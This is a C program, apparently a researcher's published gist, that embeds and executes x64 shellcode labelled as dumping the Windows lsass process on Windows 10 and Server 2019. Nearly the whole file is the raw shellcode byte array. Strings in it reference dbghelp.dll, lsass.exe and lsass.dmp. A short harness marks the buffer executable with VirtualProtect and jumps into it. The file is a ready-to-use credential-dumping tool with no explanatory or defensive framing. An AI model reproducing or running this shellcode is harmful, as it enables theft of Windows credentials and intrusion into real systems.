@OsandaMalith

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>
/*
* Title: Shellcode to dump the lsass process - Windows 10 - Server 2019.
* Author: Osanda Malith Jayathissa (@OsandaMalith)
* Website: https://osandamalith.com
*/
int main() {
char shellcode[] =
"\xE9\x3B\x03\x00\x00\xCC\xCC\xCC\x48\x89\x5C\x24\x08\x48\x89\x74"
"\x24\x10\x57\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00"
"\x8B\xF1\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41\x30\x4D\x85"
"\xC0\x0F\x84\xB8\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C"
"\x4D\x8B\x09\x42\x8B\x9C\x00\x88\x00\x00\x00\x33\xD2\xF3\x0F\x7F"
"\x04\x24\x85\xDB\x74\xD4\x48\x8B\x04\x24\x48\xC1\xE8\x10\x44\x0F"
"\xB7\xD0\x45\x85\xD2\x74\x20\x48\x8B\x4C\x24\x08\x45\x8B\xDA\xC1"
"\xCA\x0D\x80\x39\x61\x0F\xBE\x01\x7C\x03\x83\xC2\xE0\x03\xD0\x48"
"\xFF\xC1\x49\xFF\xCB\x75\xE8\x4D\x8D\x14\x18\x33\xC9\x41\x8B\x7A"
"\x20\x49\x03\xF8\x41\x39\x4A\x18\x76\x90\x8B\x1F\x45\x33\xDB\x48"
"\x8D\x7F\x04\x49\x03\xD8\x41\xC1\xCB\x0D\x0F\xBE\x03\x48\xFF\xC3"
"\x44\x03\xD8\x80\x7B\xFF\x00\x75\xED\x41\x8D\x04\x13\x3B\xC6\x74"
"\x0D\xFF\xC1\x41\x3B\x4A\x18\x72\xD1\xE9\x5C\xFF\xFF\xFF\x41\x8B"
"\x42\x24\x03\xC9\x49\x03\xC0\x0F\xB7\x04\x01\x41\x8B\x4A\x1C\xC1"
"\xE0\x02\x48\x98\x49\x03\xC0\x8B\x04\x01\x49\x03\xC0\xEB\x02\x33"
"\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x74\x24\x28\x48\x83\xC4\x10\x5F"
"\xC3\xCC\xCC\xCC\x40\x55\x53\x56\x57\x41\x54\x41\x55\x41\x56\x41"
"\x57\x48\x8D\xAC\x24\x18\xFF\xFF\xFF\x48\x81\xEC\xE8\x01\x00\x00"
"\x33\xC0\x48\x8D\x7D\xB0\xB9\x30\x01\x00\x00\xF3\xAA\x45\x33\xF6"
"\xB9\x4C\x77\x26\x07\xC7\x45\x90\x6B\x65\x72\x6E\xC7\x45\x94\x65"
"\x6C\x33\x32\xC7\x45\x98\x2E\x64\x6C\x6C\x44\x88\x75\x9C\xC7\x44"
"\x24\x70\x64\x62\x67\x68\xC7\x44\x24\x74\x65\x6C\x70\x2E\xC7\x44"
"\x24\x78\x64\x6C\x6C\x00\xC7\x45\x80\x64\x62\x67\x63\xC7\x45\x84"
"\x6F\x72\x65\x2E\xC7\x45\x88\x64\x6C\x6C\x00\xC7\x44\x24\x60\x6E"
"\x74\x64\x6C\xC7\x44\x24\x64\x6C\x2E\x64\x6C\x66\xC7\x44\x24\x68"
"\x6C\x00\xC7\x44\x24\x50\x6C\x73\x61\x73\xC7\x44\x24\x54\x73\x2E"
"\x64\x6D\x66\xC7\x44\x24\x58\x70\x00\xC7\x44\x24\x40\x6C\x73\x61"
"\x73\xC7\x44\x24\x44\x73\x2E\x65\x78\x66\xC7\x44\x24\x48\x65\x00"
"\xC6\x85\x30\x01\x00\x00\x61\xE8\x3C\xFE\xFF\xFF\x48\x8D\x4D\x90"
"\x48\x8B\xF8\xFF\xD7\x48\x8D\x4C\x24\x70\xFF\xD7\x48\x8D\x4D\x80"
"\xFF\xD7\x48\x8D\x4C\x24\x60\xFF\xD7\xB9\x80\x39\x1E\x92\xE8\x15"
"\xFE\xFF\xFF\xB9\xDA\xF6\xDA\x4F\x48\x8B\xF0\xE8\x08\xFE\xFF\xFF"
"\xB9\x27\xA9\xE8\x67\x48\x8B\xF8\xE8\xFB\xFD\xFF\xFF\xB9\x8D\x52"
"\x01\xBD\x48\x8B\xD8\xE8\xEE\xFD\xFF\xFF\xB9\x74\x71\x8D\xDC\x4C"
"\x8B\xE0\xE8\xE1\xFD\xFF\xFF\xB9\xB4\x73\x8D\xE2\x4C\x8B\xF8\xE8"
"\xD4\xFD\xFF\xFF\xB9\xEE\x95\xB6\x50\x4C\x8B\xE8\xE8\xC7\xFD\xFF"
"\xFF\xB9\x3D\xD7\xC8\x6E\x48\x89\x85\x40\x01\x00\x00\xE8\xB6\xFD"
"\xFF\xFF\xB9\x7A\x19\x77\x6A\x48\x89\x45\xA0\xE8\xA8\xFD\xFF\xFF"
"\x4C\x8D\x8D\x38\x01\x00\x00\x41\x8D\x4E\x14\x45\x33\xC0\xB2\x01"
"\xFF\xD0\x4C\x21\x74\x24\x30\x48\x8D\x4C\x24\x50\x45\x33\xC9\x45"
"\x33\xC0\xBA\x00\x00\x00\x10\xC7\x44\x24\x28\x80\x00\x00\x00\xC7"
"\x44\x24\x20\x02\x00\x00\x00\xFF\xD7\x33\xD2\x48\x89\x85\x48\x01"
"\x00\x00\x8D\x4A\x02\xFF\xD6\xC7\x45\xB0\x30\x01\x00\x00\x48\x8B"
"\xF8\x48\x8D\x55\xB0\x48\x8B\xC8\xFF\xD3\x33\xDB\x85\xC0\x74\x31"
"\xEB\x1C\x48\x8D\x55\xB0\x48\x8B\xCF\x41\xFF\xD4\x48\x8D\x55\xDC"
"\x48\x8D\x8D\x30\x01\x00\x00\x41\xFF\xD5\x44\x8B\x75\xB8\x48\x8D"
"\x54\x24\x40\x48\x8D\x8D\x30\x01\x00\x00\x41\xFF\xD7\x85\xC0\x75"
"\xD1\x45\x8B\xC6\x33\xD2\xB9\xFF\xFF\x1F\x00\xFF\x95\x40\x01\x00"
"\x00\x4C\x8B\x85\x48\x01\x00\x00\x48\x89\x5C\x24\x30\x48\x8B\xC8"
"\x41\xB9\x02\x00\x00\x00\x41\x8B\xD6\x48\x89\x5C\x24\x28\x48\x89"
"\x5C\x24\x20\xFF\x55\xA0\x48\x81\xC4\xE8\x01\x00\x00\x41\x5F\x41"
"\x5E\x41\x5D\x41\x5C\x5F\x5E\x5B\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC"
"\x56\x48\x8B\xF4\x48\x83\xE4\xF0\x48\x83\xEC\x20\xE8\xB3\xFD\xFF"
"\xFF\x48\x8B\xE6\x5E\xC3";
DWORD oldProtect;
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
if (!ret) {
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
return EXIT_SUCCESS;
}